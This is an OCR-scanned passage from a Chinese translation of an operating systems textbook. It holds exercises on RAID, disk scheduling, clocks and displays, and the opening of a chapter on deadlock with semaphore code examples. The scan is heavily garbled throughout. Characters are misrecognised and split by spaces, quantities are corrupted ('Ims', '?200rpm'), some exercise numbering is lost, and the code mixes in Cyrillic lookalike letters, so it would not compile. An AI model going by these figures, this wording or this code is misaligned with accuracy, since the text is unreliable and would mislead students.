查 。 一 旦 判明 该 数据 包 是 发 送 给 哪个 用 户 的 ， 
内 核 就 将 数据 复制 到 该 用 户 空间 。 如 果 我 们 假 
设 每 一 个 中 断 及 其 相关 的 处 理 过 程 花费 Ims 时 
间 ， 数 据 包 为 1024 字 节 (忽略 包头 )， 并 且 复 
制 一 个 字 节 花费 1hs 时 间 ， 那 么 将 数据 从 一 个 
进程 转 储 到 另 一 个 进程 的 最 大 速率 是 多 少 ? 假 
设 发 送 进程 被 阻塞 直到 接收 端 结 束 工作 并 且 返 
回 一 个 应 答 。 为 简单 起 见 ， 假 设 获得 返回 应 答 
的 时 间 非 常 短 ， 可 以 忽略 不 计 。 

13. 为 什么 打印 机 的 输出 文件 在 打印 前 通常 都 假 脱 
机 输出 在 磁盘 上 ? 

14. 3 级 RAID 只 使 用 一 个 奇偶 驱动 器 就 能 够 纠正 一 
位 错误 。 那 么 2 级 RAID 的 意义 是 什么 ?毕竟 2 级 
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RAID 也 只 能 纠正 一 位 错误 而 且 需 要 更 多 的 驱 
动 器 。 

15. 如 果 两 个 或 更 多 的 驱动 器 在 很 短 的 时 间 内 崩 
溃 ， 那 么 RAID 就 可 能 失效 。 假 设 在 给 定 的 一 
小 时 内 一 个 驱动 器 崩溃 的 概率 是 p， 那 么 在 给 
定 的 一 小 时 内 具有 k 个 驱动 器 的 RAID 失 效 的 概 
率 是 多 少 ? 

16. 从 读 性 能 、 写 性 能 、 空 间 开销 以 及 可 靠 性 方面 
对 0 级 RAID 到 5 级 RAID 进 行 比较 。 

17. 为 什么 光 存储 设备 天 生地 比 磁 存 储 设备 具有 更 
高 的 数据 密度 ?注意 : 本 题 需要 某 些 高 中 物理 
以 及 磁场 是 如 何 产生 的 知识 。 

18. 光盘 和 磁盘 的 优点 和 缺点 各 是 什么 ? 

19. 如 果 一 个 磁盘 控制 器 没有 内 部 缓冲 ， 一 旦 从 磁 
盘 上 接收 到 字 节 就 将 它们 写 到 内 存 中 ， 那 么 交 
错 编号 还 有 用 吗 ? 请 讨论 。 

20. 如 果 一 个 磁盘 是 双 交 错 编号 的 ， 那 么 该 磁盘 是 
否 还 需要 柱 面 斜 进 以 避免 在 进行 磁道 到 磁道 的 
寻 道 时 错过 数据 ? 请 讨论 你 的 答案 。 

21. 考虑 一 个 包含 16 个 磁头 和 400 个 柱 面 的 磁盘 。 
该 磁盘 分 成 4 个 100 柱 面 的 区 域 ， 不 同 的 区 域 分 
别 包含 160 个 、200 个 、240 个 和 280 个 扁 区 。 假 
设 每 个 扇 区 包含 512 字 节 ， 相 邻 柱 面 间 的 平均 
寻 道 时 间 为 Ims， 并 且 磁 盘 转 速 为 ?200rpm 。 
计算 a) 磁盘 容量 、b) 最 优 磁道 斜 进 以 及 c) 最 
大 数据 传输 率 。 

22. 一 个 磁盘 制造 商 拥 有 两 种 5.25 英 寸 的 磁盘 ， 每 
种 磁盘 都 具有 10 000 个 柱 面 。 新 磁盘 的 线性 记 
录 密 度 是 老 磁盘 的 两 倍 。 在 较 新 的 驱动 器 上 哪 
个 磁盘 的 特性 更 好 ， 哪 个 无 变化 ? 

23. 一 个 计算 机 制造 商 决定 重新 设计 Pentium 硬 盘 
的 分 区 表 以 提供 四 个 以 上 的 分 区 。 这 一 变化 有 
什么 后 果 ? 

24. 磁盘 请 求 以 柱 面 10、22、20、2、40、6 和 38 的 
次 序 进入 磁盘 驱动 器 。 寻 道 时 每 个 柱 面 移动 需 
要 6ms， 以 下 各 算法 所 需 的 寻 道 时 间 是 多 少 ? 
а) 先 来 先 服务 。 

b) 最 近 柱 面 优先 。 
с) 电梯 算法 (初始 向 上 移动 )。 
在 各 情形 下 ， 假 设 磁 营 起 始 于 柱 面 20。 

25. 调度 磁盘 请 求 的 电梯 算法 的 一 个 微小 更 改 是 总 
是 沿 相 同 的 方向 扫描 。 在 什么 方面 这 一 更 改 的 
算法 优 于 电梯 算法 ? 

26. 在 讨论 使 用 非 易 失 性 RAM 的 稳定 的 存储 器 时 ， 
掩饰 了 如 下 要 点 。 如 果 稳 定 写 完 成 但 是 在 操作 
系统 能 够 将 无 效 的 块 编号 写 入 非 易 失 性 RAM 
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之 前 发 生 了 崩溃 ， 那 么 会 有 什么 结果 ?这 一 竞 
争 条 件 会 毁灭 稳定 的 存储 器 的 抽象 概念 吗 ? 请 
解释 你 的 答案 。 


.在 关于 稳定 的 存储 器 的 讨论 中 ， 证 明了 如 果 在 


写 过程 中 发 生 了 CPU 崩溃 ， 磁 盘 可 以 恢复 到 一 
个 一 致 的 状态 〈 写 操作 或 者 已 完成 ， 或 者 完全 
没有 发 生 ) 。 如 果 在 恢复 的 过 程 中 CPU 再 次 崩 
溃 ， 这 一 特性 是 否 还 保持 ? 请 解释 你 的 答案 。 


- 某 计 算 机 上 的 时 钟 中 断 处 理 程序 每 一 时 钟 滴答 


需要 2ms (包括 进程 切换 的 开销 ) ， 时 钟 以 
60Hz 的 频率 运行 ， 那 么 CPU 用 于 时 钟 处 理 的 
时 间 比 例 是 多 少 ? 

一 台 计 算 机 以 方 波 模式 使 用 一 个 可 编程 时 钟 。 
如 果 使 用 500MHz 的 晶体 ， 为 了 达到 如 下 时 钟 
分 辩 率 ， 存 储 寄存 器 的 值 应 该 是 多 少 ? 

а) Ims (每 毫秒 一 个 时 钟 滴答 )。 

b) 100и, 

一 个 系统 通过 将 所 有 未 决 的 时 钟 请 求 链接 在 一 
起 而 模拟 多 个 时 钟 ， 如 图 5-34 所 示 。 假 设 当 前 
时 刻 是 5000， 并 且 存 在 针对 时 刻 5008、5012、 
5015、5029 和 5037 的 未 决 的 时 钟 请 求 。 请 指出 
在 时 刻 5000、5005 和 5013 时 时 钟头 、 当 前 时 刻 
以 及 下 一 信号 的 值 。 请 指出 在 时 刻 23 时 时 钟头 、 
当前 时 刻 以 及 下 一 信号 的 值 。 


“许多 UNIX 版 本 使 用 一 个 32 位 无 符号 整数 作为 


从 时 间 原 点 计算 的 秒 数 来 跟踪 时 间 。 这 些 系统 
什么 时 候 会 溢出 (年 与 月 ) ? 你 盼望 这 样 的 事 
情 实际 发 生 吗 ? 

一 个 位 图 模式 的 终端 包含 1280 x 960 个 像素 。 
为 了 滚动 一 个 窗口 ，CPU (或 者 控制 器 ) 必须 
向 上 移动 所 有 的 文本 行 ， 这 是 通过 将 文本 行 的 
所 有 位 从 视频 RAM 的 一 部 分 复制 到 另 一 部 分 
实现 的 。 如 果 一 个 特殊 的 窗口 高 60 行 宽 80 个 字 
TE (总 共 4800 个 字符 ) ， 每 个 字符 框 宽 8 个 像素 
高 16 像 素 ， 那 么 以 每 个 字 节 50ns 的 复制 速率 深 
动 整 个 窗口 需要 多 长 时 间 ? 如 果 所 有 的 行 都 是 
380 个 字符 长 ， 那 么 终端 的 等 价 波 特 率 是 多 少 ? 
将 一 个 字符 显示 在 屏幕 上 需要 5hs， 每 秒 能 够 
显示 多 少 行 ? 

接收 到 一 个 DEL (SIGINT) 字符 之 后 ， 显 示 
驱动 程序 将 丢弃 当前 排队 等 候 显 示 的 所 有 输 
出 。 为 什么 ? 

在 最 初 [BM PC 的 彩色 显示 器 上 ， 在 除了 CRT 
电子 束 垂直 回 扫 期 间 以 外 的 任何 时 间 向 视频 
RAM 中 写 数据 都 会 导致 屏幕 上 出 现 难看 的 得 
点 。 一 个 屏幕 映像 为 25 x 80 个 字符 ， 每 个 字符 
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占据 8 x 8 像素 的 方 框 。 每 行 640 像 素 在 电子 东 
的 一 次 水 平 扫描 中 给 出， 需要 花费 6ks， 包 括 
水 平 回 扫 。 屏 幕 每 秒 钟 刷新 60 次 ， 每 次 刷新 均 
需要 一 个 垂直 回 扫 期 以 便 使 电子 束 回 到 屏幕 项 
端 。 在 这 一 过 程 中 可 供 写 视频 RAM 的 时 间 比 
例 是 多 少 ? 

35. 计算 机 系统 的 设计 人 员 期 望 鼠 标 移动 的 最 大 速 
率 为 20cm/s。 如 果 一 个 鼠标 步 是 0.Imm， 并 且 每 
个 鼠标 消息 3 个 字 节 ， 假 设 每 个 鼠标 步 都 是 单独 
报告 的 ， 那 么 鼠标 的 最 大 数据 传输 率 是 多 少 ? 

36. 基本 的 加 性 颜色 是 红色 、 绿 色 和 蓝 色 ， 这 意味 
着 任何 颜色 都 可 以 通过 这 些 颜 色 的 线性 又 加 而 
构造 出 来 。 某 人 拥有 一 张 不 能 使 用 全 24 位 颜色 
表示 的 彩色 照片 ， 这 可 能 吗 ? 

37. 将 字符 放置 在 位 图 模式 的 屏幕 上 ， 一 种 方法 是 
使 用 BitBlt 从 一 个 字体 表 复 制 位 图 。 假 设 一 种 
特殊 的 字体 使 用 16 x 24 像 素 的 字符 ， 并 且 采 用 
RGB 真 彩色 。 

(a) 每 个 字符 占用 多 少 字体 表 空 间 ? 
(b) 如 果 复 制 一 个 字 节 花费 100ns (包括 系统 开销 )， 
那么 到 屏幕 的 输出 率 是 每 秒 多 少 个 字符 ? 

38. 假设 复制 一 个 字 节 花费 10ns， 那 么 对 于 80 字 符 
x 25 行 文本 模式 的 内 存 映射 的 屏幕 ， 完 全 重 写 
屏 医 要 花费 多 长 时 间 ? 采用 24 位 彩色 的 1024 х 
768 像 素 的 图 形 屏幕 情况 怎样 ? 

39. 在 图 5-40 中 存在 一 个 窗口 类 需要 调用 
RegisterClass 进 行 注册 ， 在 图 5-38 中 对 应 的 X 
窗口 代码 中 ， 并 不 存在 这 样 的 调用 或 与 此 相似 
的 任何 调用 。 为 什么 ? 

40. 在 课文 中 我 们 给 出 了 一 个 如 何在 屏幕 上 画 一 个 
矩形 的 例子 ， 即 使 用 Windows GDI: 
Rectangle(hdc, xleft ytop, xright, ybottom); 


是 否 存在 对 于 第 一 个 参数 (hdc) 的 实际 需 
Ж? 如 果 存 在 ， 是 什么 ? ER, ENBERE 
为 参数 而 显 式 地 指明 了 。 

41. 一 台 THINC 终 端 用 于 显示 一 个 网 页 ， 该 网 页 包 
含 一 个 动画 卡通 ， 卡 通 大 小 为 400 х 160 像 素 ， 


42. 
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47. 


以 每 秒 10 帧 的 速度 播放 。 显 示 该 卡通 会 消耗 
100Mbps 决 速 以 太 网 带宽 多 大 的 部 分 ? 

在 一 次 测试 中 ，THINC 系 统 被 观测 到 对 于 
1Mbps 的 网 络 工作 良好 。 在 多 用 户 的 情形 中 会 
有 问题 吗 ? 提示 考虑 大 量 的 用 户 在 观看 时 间 
表 排 好 的 TV 节目 ， 并 且 相 同 数目 的 用 户 在 浏 
览 万 维 网 。 

如 果 一 个 CPU 的 最 大 电压 V 被 前 减 到 V/in， 那 么 
它 的 功率 消耗 将 下 降 到 其 原始 值 的 Vn?， 并 且 
它 的 时 钟 速度 下 降 到 其 原始 值 的 1/n。 假 设 一 
个 用 户 以 每 秒 1 个 字符 的 速度 键 和 字符， 处 理 
每 个 字符 所 需要 的 CPU 时 间 是 100ms ，n 的 最 
优 值 是 多 少 ? 与 不 前 减 电 压 相 比 ， 以 百分比 表 
示 相 应 的 能 量 节约 了 多 少 ? 假设 空闲 的 CPU 完 
全 不 消耗 能 量 。 

一 台 笔 记 本 电脑 被 设置 成 最 大 地 利用 功率 节省 
特性 ， 包 括 在 一 段 时 间 不 活动 之 后 关闭 显示 器 
和 硬盘 。 一 个 用 户 有 时 在 文本 模式 下 运行 
UNIX 程 序 ， 而 在 其 他 时 间 使 用 X 窗 口 系统 。 
她 惊讶 地 发 现 当 她 使 用 仅 限 文本 模式 的 程序 
时 ， 电 字 的 寿命 相当 长 。 为 什么 ? 

编写 一 个 程序 模拟 稳定 的 存储 器 ， 在 你 的 磁盘 
上 使 用 两 个 大 型 的 固定 长 度 的 文件 来 模拟 两 块 
磁盘 。 

编写 一 个 程序 实现 三 个 磁盘 臂 调 度 算法 。 编 写 
一 个 驱动 程序 随机 生成 一 个 柱 面 号 序列 (0— 
999) ， 针 对 该 序列 运行 三 个 算法 并 且 打印 出 在 
三 个 算法 中 磁盘 臂 需要 来 回 移动 的 总 距离 (E 
面 数 ) 。 


.编写 一 个 程序 使 用 单一 的 时 钟 实现 多 个 定时 


器 。 该 程序 的 输入 包含 四 种 命令 (S <in>, T, 
E <int>, P) 的 序列 : S <int> 设 置 当前 时 刻 为 
<i>, T 是 一 个 时 钟 滴答 ，E <int> 调 度 一 个 信 
号 在 <int> 时 刻 发 生 ，P 打 印 出 当前 时 刻 、 下 一 
信号 和 时 钟头 的 值 。 当 唤起 一 个 信号 时 ， 你 的 
程序 还 应 该 打印 出 一 条 语句 。 


第 6 章 Ж 锁 


在 计算 机 系统 中 有 很 多 独占 性 的 资源 ， 在 任 一 时 刻 它们 都 只 能 被 一 个 进程 使 用 。 常 见 的 有 打印 机 、 
磁带 以 及 系统 内 部 表 中 的 表 项 。 打 印 机 同时 让 两 个 进程 打印 将 造成 混乱 的 打印 结果 ， 两 个 进程 同时 使 用 
同一 文件 系统 表 中 的 表 项 会 引起 文件 系统 的 竣 痊 。 正 因为 如 此 ， 操 作 系统 都 具有 授权 一 个 进程 (临时 ) 
排他 地 访问 某 一 种 资源 的 能 力 。 

在 很 多 应 用 中 ， 需 要 一 个 进程 排他 性 地 访问 若干 种 资源 而 不 是 一 种 。 例 如 ， 有 两 个 进程 准备 分 别 将 
扫描 的 文档 记录 到 CD 上 。 进 程 A 请 求 使 用 扫描 仪 ， 并 被 授权 使 用 。 但 进程 B 首 先 请 求 CD 刻录 机 ， 也 被 授 
权 使 用 。 现 在 ，A 请 求 使 用 CD 刻录 机 ， 但 该 请 求 在 B 释 放 CD 刻录 机 前 会 被 拒绝 。 但 是 ， 进 程 B 非 但 不 放 
弃 CD 刻 录 机 ， 而 且 去 请 求 扫描 仪 。 这 时 ， 两 个 进程 都 被 阻塞 ， 并 且 一 直 处 于 这 样 的 状态 。 这 种 状况 就 
是 死 锁 (deadlock), 

死 锁 也 可 能 发 生 在 机 器 之 间 。 例 如 ， 许 多 办 公 室 中 都 用 计算 机 连 成 局 域 网 ， 扫 描 仪 、CD 刻 录 机 、 
打印 机 和 磁带 机 等 设备 也 连接 到 局 域 网 上 ， 成 为 共享 资源 ， 供 局 域 网 中 任何 机 器 上 的 人 和 用 户 使 用 。 如 
果 这 些 设备 可 以 远程 保留 给 某 一 个 用 户 〈 比 如 ， 在 用 户 家 里 的 机 器 使 用 这 些 设备 ) ， 那 么 ， 也 会 发 生 上 
面 描述 的 死 锁 现象 。 更 复杂 的 情形 会 引起 三 个 、 四 个 或 更 多 设备 和 用 户 发 生死 锁 。 

除了 请 求 独占 性 的 MO 设备 之 外 ， 别 的 情况 也 有 可 能 引起 死 锁 。 例 如 ， 在 一 个 数据 库 系统 中 ， 为 了 
避免 竟 争 ， 可 对 若干 记录 加 锁 。 如 果 进 程 A 对 记录 R1 加 了 锁 ， 进 程 B 对 记录 R2 加 了 锁 ， 接 着 ， 这 两 个 进 
程 又 试图 各 自 把 对 方 的 记录 也 加 锁 ， 这 时 也 会 产生 死 锁 。 所 以 ， 软 硬件 资源 都 有 可 能 出 现 死 锁 。 

在 本 章 里 ， 我 们 准备 考察 几 类 死 锁 ， 了 解 它们 是 如 何 出 现 的 ， 学 习 防止 或 者 避免 死 锁 的 办 法 。 尽 管 
我 们 所 讨论 的 是 操作 系统 环境 下 出 现 的 死 锁 问 题 ， 但 是 在 数据 库 系统 和 许多 计算 机 应 用 环境 中 都 可 能 产 
生死 锁 ， 所 以 我 们 所 介绍 的 内 容 实际 上 可 以 应 用 到 包含 多 个 进程 的 系统 中 。 有 很 多 有 关 死 锁 的 著作 ， 
《Operating Systems Review》 中 列 出 了 两 本 参考 书 (Newton, 1979; Zobel, 1983), ， 有 兴趣 的 读者 可 以 参 
考 这 两 本 书 。 死 锁 方面 的 大 多 数 研究 工作 在 1980 年 以 前 就 完成 了 ， 尽 管 所 列 的 参考 文献 有 些 老 ， 但 是 这 
些 内 容 依 然 是 很 有 用 的 。 


6.1 资源 

大 部 分 死 锁 都 和 资源 相关 ， 所 以 我 们 首先 来 看 看 资源 是 什么 。 在 进程 对 设备 、 文 件 等 取得 了 排他 性 
访问 权时 ， 有 可 能 会 出 现 死 锁 。 为 了 尽 可 能 使 关于 死 锁 的 讨论 通用 ， 我 们 把 这 类 需要 排他 性 使 用 的 对 象 
称 为 资源 (resource)。 资 源 可 以 是 硬件 设备 (如 磁带 机 ) 或 是 一 组 信息 (如 数据 库 中 一 个 加 锁 的 记录 )。 
通常 在 计算 机 中 有 多 种 (可 获取 的 ) 资源 。 一 些 类 型 的 资源 会 有 若干 个 相同 的 实例 ， 如 三 台 磁 带 机 。 当 
某 一 资源 有 若干 实例 时 ， 其 中 任何 一 个 都 可 以 用 来 满足 对 资源 的 请 求 。 简 单 来 说 ， 资 源 就 是 随 着 时 间 的 
推移 ， 必 须 能 获得 、 使 用 以 及 释放 的 任何 东西 。 


6.1.1 可 抢占 资源 和 不 可 抢占 资源 

资源 分 为 两 类 ， 可 抢占 的 和 不 可 抢占 的 。 可 抢占 资源 (preemptable resource) 可 以 从 拥有 它 的 进程 
中 抢占 而 不 会 产生 任何 副作用 ， 存 储 器 就 是 一 类 可 抢占 的 资源 。 例 如 ， 一 个 系统 拥有 256MB 的 用 户 内 存 
和 一 台 打印 机 。 如 果 有 两 个 256MB 内 存 的 进程 都 想 进行 打印 ， 进 程 A 请 求 并 获得 了 打印 机 ， 然 后 开始 计 
算 要 打印 的 值 。 在 它 没有 完成 计算 任务 之 前 ， 它 的 时 间 片 就 已 经 用 完 并 被 换 出 。 

然后 ， 进 程 B 开 始 运行 并 请 求 打印 机 ， 但 是 没有 成 功 。 这 时 有 潜在 的 死 锁 危 险 。 由 于 进程 A 拥有 打 
印 机 ， 而 进程 B 占 有 了 内 存 ， 两 个 进程 都 缺少 另外 一 个 进程 拥有 的 资源 ， 所 以 任何 一 个 都 不 能 继续 执行 。 
不 过 ， 幸 运 的 是 通过 把 进程 B 换 出 内 存 、 把 进程 A 换 入 内 存 就 可 以 实现 抢占 进程 B 的 内 存 。 这 样 ， 进 程 A 
继续 运行 并 执行 打印 任务 ， 然 后 释放 打印 机 。 在 这 个 过 程 中 不 会 产生 死 锁 。 
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相反 ， 不 可 抢占 资源 (nonpreemptable resource) 是 指 在 不 引起 相关 的 计算 失败 的 情况 下 ， 无 法 把 
它 从 占有 它 的 进程 处 抢占 过 来 。 如 果 一 个 进程 已 开始 刻 盘 ， 突 然 将 CD 刻录 机 分 配给 另 一 个 进程 ， 那 么 
将 划 坏 CD 航 。 在 任何 时 刻 CD 刻录 机 都 是 不 可 抢占 的 。 

总 的 来 说 ， 死 锁 和 不 可 抢占 资源 有 关 ， 有 关 可 抢占 资源 的 潜在 死 锁 通常 可 以 通过 在 进程 之 间 重新 分 
配 资源 而 化 解 。 所 以 ， 我 们 的 重点 放 在 不 可 抢占 资源 上 。 

使 用 一 个 资源 所 需要 的 事件 顺序 可 以 用 抽象 的 形式 表示 如 下 : 

1) 请 求 资源 。 

2) 使 用 资源 。 

3) 释放 资源 。 

车 请 求 时 资源 不 可 用 ， 则 请 求 进程 被 迫 等 待 。 在 一 些 操作 系统 中 ， 资 源 请 求 失败 时 进程 会 自动 被 阻 
塞 ， 在 资源 可 用 时 再 唤醒 它 。 在 其 他 的 系统 中 ， 资 源 请 求 失败 会 返回 一 个 错误 代码 ， 请 求 的 进程 会 等 待 
一 段 时 间 ， 然 后 重 试 。 

当 一 个 进程 请 求 资 源 失败 时 ， 它 通常 会 处 于 这 样 一 个 小 循环 中 : 请 求 资源 ， 休 眠 ， 再 请 求 。 这 个 进 
程 虽 然 没 有 被 阻塞 ， 但 是 从 各 角度 来 说 ， 它 不 能 做 任何 有 价值 的 工作 ， 实 际 和 阻塞 状态 -- 样 。 在 后 面 的 
讨论 中 ， 我 们 假设 ， 如 果 某 个 进程 请 求 资源 失败 ， 那 么 它 就 进入 休眠 状态 。 

请 求 资源 的 过 程 是 非常 依赖 于 系统 的 。 在 某 些 系统 中 ， 提 供 了 request 系 统 调用 ， 用 于 允许 进程 资 
源 请 求 。 在 另 一 些 系统 中 ， 操 作 系统 只 知道 资源 是 一 些 特殊 文件 ， 在 任何 时 刻 它们 最 多 只 能 被 一 个 进程 
打开 。 一 般 情 况 下 ， 这 些 特殊 文件 用 open 调 用 打开 。 如 果 这 些 文件 正在 被 使 用 ， 那 么 ， 发 出 open 调 用 


的 进程 会 被 阻塞 ， 一 直到 文件 的 当前 使 用 者 关闭 该 文件 为 止 。 
6.1.2 资源 获取 


对 于 数据 库 系统 中 的 记录 这 类 资源 ， 应 该 由 用 户 进程 来 管理 其 使 用 。 一 种 允许 用 户 管理 资源 的 可 能 


方法 是 为 每 一 个 资源 配置 一 个 信号 量 。 这 些 信号 量 都 被 初始 化 为 1。 互 斥 
信号 量 也 能 起 到 相同 的 作用 。 上 述 的 三 个 步骤 可 以 实现 为 信号 量 的 down 
操作 来 获取 资源 ， 使 用 资源 ， 最 后 使 用 up 操作 来 释放 资源 。 这 三 个 步骤 
如 图 6-1a 所 示 。 

有 时 候 ， 进 程 需要 两 个 或 更 多 的 资源 ， 它 们 可 以 顺序 获得 ， 如 图 
6-1b 所 示 。 如 果 需 要 两 个 以 上 的 资源 ， 通 常 都 是 连续 获取 。 

到 目前 为 止 ， 进 程 的 执行 不 会 出 现 问题 。 在 只 有 一 个 进程 参与 时 ， 
所 有 的 工作 都 可 以 很 好 地 完成 。 当 然 ， 如 果 只 有 一 个 进程 ， 就 没有 必要 
这 么 慎重 地 获取 资源 ， 因 为 不 存在 资源 竞争 。 

现在 考虑 两 个 进程 (AMB) 以 及 两 个 资源 的 情况 。 图 6-2 描 述 了 两 
种 不 同 的 方式 。 在 图 6-2a 中 ， 两 个 进程 以 相同 的 次 序 请 求 资源 ， 在 图 6- 
2b 中 ， 它 们 以 不 同 的 次 序 请 求 资源 。 这 种 不 同 看 似 微不足道 ， 实 则 不 然 。 

在 图 6-2a 中 ， 其 中 一 个 进程 先 于 另 一 个 进程 获取 资源 。 这 个 进程 能 
够 成 功 地 获取 第 二 个 资源 并 完成 它 的 任务 。 如 果 另 一 个 进程 想 在 第 一 个 
资源 被 释放 之 前 获取 该 资源 ， 那 么 它 会 由 于 资源 加 锁 而 被 阻塞 ， 直 到 该 
资源 可 用 为 止 。 

图 6-2b 的 情况 就 不 同 了 。 可 能 其 中 一 个 进程 获取 了 两 个 资源 并 有 
效 地 阻塞 了 另外 一 个 进程 ， 直 到 它 使 用 完 这 两 个 资源 为 止 。 但 是 ， 也 
有 可 能 进程 A 获 取 了 资源 1， 进 程 B 获 取 了 资源 2， 每 个 进程 如 果 都 想 请 
求 另 一 个 资源 就 会 被 阻塞 ， 那 么 ， 每 个 进程 都 无 法 继续 运行 。 这 种 情 
况 就 是 死 锁 。 


typedef int semaphore; 
semaphore resource. 1; 


void process _A(void) { 
down(&resource_1); 
use._resource_1( ); 
up(&resource 1); 


а) 


typedef int semaphore; 
semaphore геѕоигсе _1; 
semaphore resource_2; 


void process_Alvoid) { 
down(&resource _1); 
down(&resource _2); 
use_both_ resources( ); 
up(&resource _2); 
up(&resource _1); 


b) 


图 6-1 使 用 信号 量 保护 资源 ， 
习 一 个 资源 ，b) 两 个 资源 


这 里 我 们 可 以 看 到 一 个 编码 风格 上 的 细微 差别 ( 哪 一 个 资源 先 获取 ) 造成 了 可 以 执行 的 程序 和 不 能 
执行 而 且 无 法 检测 错误 的 程序 之 间 的 差别 。 因 为 死 锁 是 非常 容易 发 生 的 ， 所 以 有 很 多 人 研究 如 何 处 理 这 


种 情况 。 这 一 章 就 会 详细 讨论 死 锁 问题 ， 并 给 出 一 些 对 策 。 
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typedef int semaphore; 

semaphore геѕошгсе _1; semaphore геѕошгсе _1; 

semaphore resource 2; semaphore геѕошгсе. 2; 

void process_A(void) { void process_A(void) { 
down(&resource 1); down(&resource _1); 
down(&resource _2); down(&resource_2); 
use_both_resources( ); Use_both_resources( ); 
up(&resource _2); ир(&гезоигсе _2); 
ир(&гезоигсе _1); up(&resource _ 1); 

} } 

void process_B(void) { void process_B(void) { 
down(&resource _1); down(&resource 2); 
down(&resource_2); down(&resource_1); 
use_both_resources( ); Use_both_resources( ); 
ир(&гезоигсе _2); ир(&геѕошгсе _1); 
ир(&геѕошсе _1); ир(&гезоигсе _2); 

} } 


а) b) 
图 6-2 a) 无 死 锁 的 编码 ，b) 有 可 能 出 现 死 锁 的 编码 


6.2 死 锁 概 述 

死 锁 的 规范 定义 如 下 : 

如 果 一 个 进程 集合 中 的 每 个 进程 都 在 等 待 只 能 由 该 进程 全 合 中 的 其 他 进程 才能 引发 的 事件 ， 那么 ， 
该 进程 集合 就 是 死 锁 的 。 

由 于 所 有 的 进程 都 在 等 待 ， 所 以 没有 一 个 进程 能 引发 可 以 唤醒 该 进程 集合 中 的 其 他 进程 的 事件 ， 这 样 ， 
所 有 的 进程 都 只 好 无 限期 等 待 下 去 。 在 这 一 模型 中 ， 我 们 假设 进程 只 含有 一 个 线程 ， 并 且 被 阻塞 的 进程 无 法 由 
中 断 唤 醒 。 无 中 断 条 件 使 死 锁 的 进程 不 能 被 时 钟 中 断 等 唤醒 ， 从 而 不 能 引发 释放 该 集合 中 的 其 他 进程 的 事件 。 

在 大 多 数 情况 下 ， 每 个 进程 所 等 待 的 事件 是 释放 该 进程 集合 中 其 他 进程 所 占有 的 资源 。 换 言 之 ， 这 
个 死 锁 进程 集合 中 的 每 一 个 进程 都 在 等 待 另 一 个 死 锁 的 进程 已 经 占有 的 资源 。 但 是 由 于 所 有 进程 都 不 能 
运行 ， 它 们 中 的 任何 一 个 都 无 法 释放 资源 ， 所 以 没有 一 个 进程 可 以 被 唤醒 。 进程 的 数量 以 及 占有 或 者 请 
求 的 资源 数量 和 种 类 都 是 无 关 紧 要 的 ， 而 且 无 论 资源 是 何 种 类 型 (软件 或 者 硬件 ) 都 会 发 生 这 种 结果 。 
这 种 死 锁 称 为 资源 死 锁 (resource deadlock)。 这 是 最 常见 的 类 型 ， 但 并 不 是 惟一 的 类 型 。 本 节 我 们 会 详 
细 介 绍 一 下 资源 死 锁 ， 在 本 章 末 再 概述 其 他 类 型 的 死 锁 。 


6.2.1 资源 死 锁 的 条 件 

Сойтап А. (1971) ETRE (资源 ) 死 锁 的 四 个 必要 条 件 : 

1) 互 斥 条 件 。 每 个 资源 概 么 已 经 分 配给 了 一 个 进程 ， 要 么 就 是 可 用 的 。 

2) 占有 和 等 待 条 件 。 已 经 得 到 了 某 个 资源 的 进程 可 以 再 请 求 新 的 资源 。 

3) 不 可 抢占 条 件 。 已 经 分 配给 一 个 进程 的 资源 不 能 强制 性 地 被 抢占 ， 它 只 能 被 占有 它 的 进程 显 式 地 释放 。 

4) 环 路 等 待 条 件 。 死 锁 发 生 时 ， 系统 中 一 定 有 由 两 个 或 两 个 以 上 的 进程 组 成 的 一 条 环 路 ， 该 环 路 中 
的 每 个 进程 都 在 等 待 着 下 一 个 进程 所 占有 的 资源 。 

死 锁 发 生 时 ， 以 上 四 个 条 件 一 定 是 同时 满足 的 。 如 果 其 中 任何 一 个 条 件 不 成 立 ， 死 锁 就 不 会 发 生 。 

值得 注意 的 是 ， 每 一 个 条 件 都 与 系统 的 一 种 可 选 策略 相关 。 一 种 资源 能 否 同时 分 配给 不 同 的 进程 ? 
一 个 进程 能 否 在 占有 一 个 资源 的 同时 请 求 另 一 个 资源 ? 资源 能 否 被 抢占 ? 循环 等 待 环 路 是 否 存在 ?我 们 
在 后 面 会 看 到 怎样 通过 破坏 上 述 条 件 来 预防 死 锁 。 


6.2.2 死 锁 建 模 
Holt (1972) 指出 如 何 用 有 向 图 建立 上 述 四 个 条 件 的 模型 。 在 有 向 图 中 有 两 类 节点 ， 用 贺 形 表示 
的 进程 ， 用 方形 表示 的 资源 。 从 资源 节点 到 进程 节点 的 有 向 边 代表 该 资源 已 被 请 求 、 授 权 并 被 进程 占用 。 
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在 图 6-3a 中 ， 当 前 资源 R 正 被 进程 A 占 用 。 

由 进程 节点 到 资源 节点 的 有 向 边 表明 当前 进程 正 
在 请 求 该 资源 ， 并 且 该 进程 已 被 阻塞 ， 处 于 等 待 该 资 
源 的 状态 。 在 图 6-3b 中 ， 进 程 B 正 等 待 着 资源 S。 图 6-3c 
说 明 进入 了 死 锁 状态 ， 进 程 C 等 待 着 资源 T， 资 源 T 被 进 
程 D 占 用 着 ， 进 程 D 又 等 待 着 由 进程 C 占 用 着 的 资源 U。 
这 样 两 个 进程 都 得 等 竺 下去。 图 中 的 环 表示 与 这 些 进 
程 和 资源 有 关 的 死 锁 。 在 本 例 中 ， 环 是 CTD-U-C。 

我 们 再 看 看 使 用 资源 分 配 图 的 方法 。 假 设 有 三 个 进 
程 (A，B，C) 及 三 个 资源 (R，S，T)。 三 个 进程 对 
资源 的 请 求 和 释放 如 图 6-4a 一 图 6-4c 所 示 。 操 作 系 统 可 
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图 6-3 资源 分 配 图 : a) 占有 一 个 资源 ， 
b) 请 求 一 个 资源 ，c) 死 锁 


以 随时 选 样 任 一 非 阻塞 进程 运行 ， 所 以 它 可 选择 A 运行 一 直到 A 完成 其 所 有 工作 ， 接 着 运行 B， 最 后 运行 C。 
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图 6-4 一 个 死 锁 是 如 何 产生 以 及 如 何 避 免 的 例子 
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上 述 的 执行 次 序 不 会 引起 死 锁 (因为 没有 资源 的 竞争 ) ， 但 程序 也 没有 任何 并 行 性 。 进 程 在 执行 过 
程 中 ， 不 仅 要 请 求 和 释放 资源 ， 还 要 做 计算 或 者 输入 /输出 工作 。 如 果 进 程 是 串 行 运行 ， 不 会 出 现 当 一 
个 进程 等 待 VO 时 让 另 一 个 进程 占用 CPU 进行 计算 的 情形 。 因 此 ， 严 格 的 串 行 操作 有 可 能 不 是 最 优 的 。 
